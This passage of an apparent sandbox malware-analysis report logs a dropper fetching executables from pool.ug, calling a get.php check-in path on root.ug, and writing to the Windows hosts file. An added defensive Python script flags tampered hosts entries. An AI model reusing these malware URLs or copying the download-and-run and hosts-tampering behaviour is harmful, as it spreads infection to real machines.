Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin2.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 4608 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 7680 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/3.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/3.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #5
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/4.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/4.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #6
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/5.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/5.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 19
Fn
Data
Read Response size = 10240, size_out = 2048 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #7
Information Value
User Agent Microsoft Internet Explorer
Server Name root.ug
Server Port 80
Username -
Password -
Data Sent 537 bytes
Data Received 1.24 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = root.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php?pid=32EB8DA0DCF8DD23092C768E66F3E191&first=true True 1
Fn
Read Response size = 1024, size_out = 255 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #8
Information Value
User Agent Microsoft Internet Explorer
Server Name root.ug
Server Port 80
Username -
Password -
Data Sent 537 bytes
Data Received 1.24 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = root.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php?pid=32EB8DA0DCF8DD23092C768E66F3E191&first=true True 1
Fn
Read Response size = 1024, size_out = 255 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #9
Information Value
User Agent Microsoft Internet Explorer
Server Name root.ug
Server Port 80
Username -
Password -
Data Sent 537 bytes
Data Received 1.24 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = root.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/AsdweufhjJfh3745ihdjf39458penelop11/auhsduyewy783/get.php?pid=32EB8DA0DCF8DD23092C768E66F3E191&first=true True 1
Fn
Read Response size = 1024, size_out = 255 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #10
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.19 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Process #6: updatewin1.exe
671 0
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:38, Reason: Child Process
Unmonitor End Time: 00:01:41, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0x8f0
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x354, 0x128, 0x5E4, 0x41C, 0x7A8
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin1.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
buffer 0x00505000 0x00505FFF Marked Executable - 32-bit - False False
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False False
Hook Information
Type Installer Target Size Information Actions
IAT private_0x00000000004f0000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000910000:+0x65f6f6
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe show_window = SW_SHOW True 1
Fn
Module (154)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:22:58 (UTC) True 2
Fn
Get Time type = Ticks, time = 157670 True 1
Fn
Get Time type = Performance Ctr, time = 21909222860 True 1
Fn
Get Time type = Ticks, time = 157795 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = Performance Ctr, time = 21947172015 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Process #7: updatewin2.exe
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:43, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
Information Value
PID 0x570
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x56C
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x005C5000 0x005C5FFF Marked Executable - 32-bit - False False
updatewin2.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
updatewin2.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False False
Modified Files
Filename: C:\Windows\System32\drivers\etc\hosts
File Size: 7.92 KB
MD5: 360d265eddea8679c434a205f7ade7ad
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax
YARA Match: False
Host Behavior
File (9)
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\drivers\etc\hosts desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\System32\drivers\etc\hosts type = size True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Windows\System32\drivers\etc\hosts size = 7286 True 1
Fn
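The File table above records updatewin2.exe opening C:\Windows\System32\drivers\etc\hosts with GENERIC_WRITE and writing 7286 bytes to it, but the report does not show what was written. The usual triage follow-up is to pull the hosts file from the host and look for names that have been sinkholed (pointed at 0.0.0.0 or loopback) or redirected to an attacker-controlled address. The script below is an added example for this page, not VMRay's code and not code recovered from the sample: the watchlist of vendor/update domains and the SAMPLE_HOSTS text are constructed for illustration, and the parser accepts any hosts-file text (for instance one carved from a disk image), not only the sample.

```python
"""Flag sinkholed or redirected names in a Windows hosts file.

Added example for this report, not VMRay's or the sample's code. The
watchlist and SAMPLE_HOSTS below are constructed for illustration.
"""
import ipaddress
import sys
from typing import List, NamedTuple

# Names a stock hosts file legitimately maps to loopback.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                  "ip6-localhost", "ip6-loopback"}
# Addresses used to make a name unresolvable ("sinkholed").
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1", "::"}
# Assumption: illustrative suffixes of vendor/update domains that malware
# commonly blocks or redirects; substitute your own list.
WATCHLIST_SUFFIXES = ("microsoft.com", "windowsupdate.com", "virustotal.com",
                      "avast.com", "kaspersky.com", "eset.com", "malwarebytes.com")


class HostsEntry(NamedTuple):
    line_no: int
    ip: str
    names: tuple


class Finding(NamedTuple):
    line_no: int
    name: str
    ip: str
    kind: str  # "sinkholed" or "redirected"


def parse_hosts(text: str) -> List[HostsEntry]:
    """Parse hosts-file text; comments, blank and malformed lines are skipped."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address: ignore the line
        entries.append(HostsEntry(line_no, fields[0],
                                  tuple(f.lower() for f in fields[1:])))
    return entries


def on_watchlist(name: str) -> bool:
    return any(name == s or name.endswith("." + s) for s in WATCHLIST_SUFFIXES)


def find_suspicious(text: str) -> List[Finding]:
    """Return every non-loopback name that is sinkholed, plus watchlisted
    names pointed at any other address (a redirect to an attacker host)."""
    findings = []
    for entry in parse_hosts(text):
        for name in entry.names:
            if name in LOOPBACK_NAMES:
                continue
            if entry.ip in SINKHOLE_IPS:
                findings.append(Finding(entry.line_no, name, entry.ip, "sinkholed"))
            elif on_watchlist(name):
                findings.append(Finding(entry.line_no, name, entry.ip, "redirected"))
    return findings


# Constructed sample: a stock header followed by the kind of entries
# tampering leaves behind. Line numbers in findings refer to this text.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#    127.0.0.1       localhost
#    ::1             localhost
192.168.1.20    build-server.corp.local
0.0.0.0         www.virustotal.com
0.0.0.0         update.microsoft.com   # blocked
127.0.0.1       www.avast.com
10.0.0.5        download.windowsupdate.com
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. a hosts file carved from a disk image
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for f in find_suspicious(text):
        print(f"line {f.line_no}: {f.name} -> {f.ip} ({f.kind})")
```

Run it with the path of the recovered hosts file as its only argument; without an argument it analyses the constructed sample and reports three sinkholed names and one redirect. Entries that map a public name to 0.0.0.0 are not proof of malice on their own (ad-blocking lists do the same), so the output is a review list rather than a verdict. As an aside on this report's numbers: the 7.92 KB size listed under Modified Files is consistent with the 7286-byte write having been appended to a stock 824-byte hosts file (an inference from the figures on this page, since the written content is not shown).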
Module (135)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, size = 260 True 1
Fn
